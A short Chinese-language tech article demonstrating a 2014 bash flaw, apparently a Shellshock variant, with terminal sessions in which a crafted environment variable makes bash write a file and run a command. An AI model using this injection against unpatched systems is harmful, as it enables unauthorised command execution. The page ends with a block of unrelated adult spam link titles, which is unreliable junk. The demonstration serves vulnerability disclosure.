《電子技術應用》
您所在的位置:首頁 > 嵌入式技術 > 設計應用 > 一個linux下的bash安全漏洞
一個linux下的bash安全漏洞
摘要:
關鍵詞: bash 09 2014 2713 david davidcchen
Abstract:
Key words :

 1. 通過設置一個特殊的環(huán)境變量的env,能間接地查到到linux命令的屬性,如下:

  [2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

  ls: cannot access date: No such file or directory

  [2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>\' bash -c 'date'

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  [2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date

  -rw-rw-r--. 1 david david 0 Sep 27 13:01 date

  [2014-09-27 13:01:27 david@davidcchen ~]$

  2. 一次運行環(huán)境變量。

  [2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version

  zsh 4.3.10 (x86_64-redhat-linux-gnu)

  [2014-09-27 13:03:24 david@davidcchen ~]$ bash --version

  GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)

  Copyright (C) 2009 Free Software Foundation, Inc.

  License GPLv3+: GNU GPL version 3 or later

  This is free software; you are free to change and redistribute it.

  There is NO WARRANTY, to the extent permitted by law.

  [2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\' bash -c "echo date"; cat echo; rm echo

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  Sat Sep 27 13:03:52 CST 2014

  ---------->成功運行date命令

此內容為AET網(wǎng)站原創(chuàng),未經(jīng)授權禁止轉載。
主站蜘蛛池模板: 91精品综合久久久久m3u8 | 国产精品在线播放 | 国产高清美女一级a毛片久久 | 日本精品99 | 国产一区二区三区久久精品小说 | 久久久久欧美国产精品 | 国产成人微拍精品 | 亚洲品质自拍视频网站 | 黄 色 成 年 人小说 | 日本国产欧美 | 精品国产综合区久久久久99 | 高清国产一区二区三区 | 久久国产精品二区99 | 久久亚洲国产精品 | 国产精品资源手机在线播放 | 日本久草网| 国产高清一级视频在线观看 | 久久精品国产免费中文 | 国产欧美日韩精品第一区 | 欧美一区二区三区精品 | 亚洲午夜片 | 国产高清一区二区 | 久久国产片 | 美女被免费网站视频软件 | 三级国产三级在线 | 欧美一区二区三区免费看 | 欧美成人国产一区二区 | 免费观看的毛片手机视频 | 日日摸日日碰夜夜97 | 国产欧美一区二区三区视频在线观看 | 高清欧美性狂猛bbbbbbxxxx | 夜精品a一区二区三区 | 大量真实偷拍情侣视频野战 | 日韩国产在线观看 | 91精品手机国产露脸 | 欧美精品一区二区在线观看 | 亚洲免费视| 日韩欧国产精品一区综合无码 | 鸥美性生交xxxxx久久久 | 亚洲精品久久久成人 | 久久久久欧美精品 |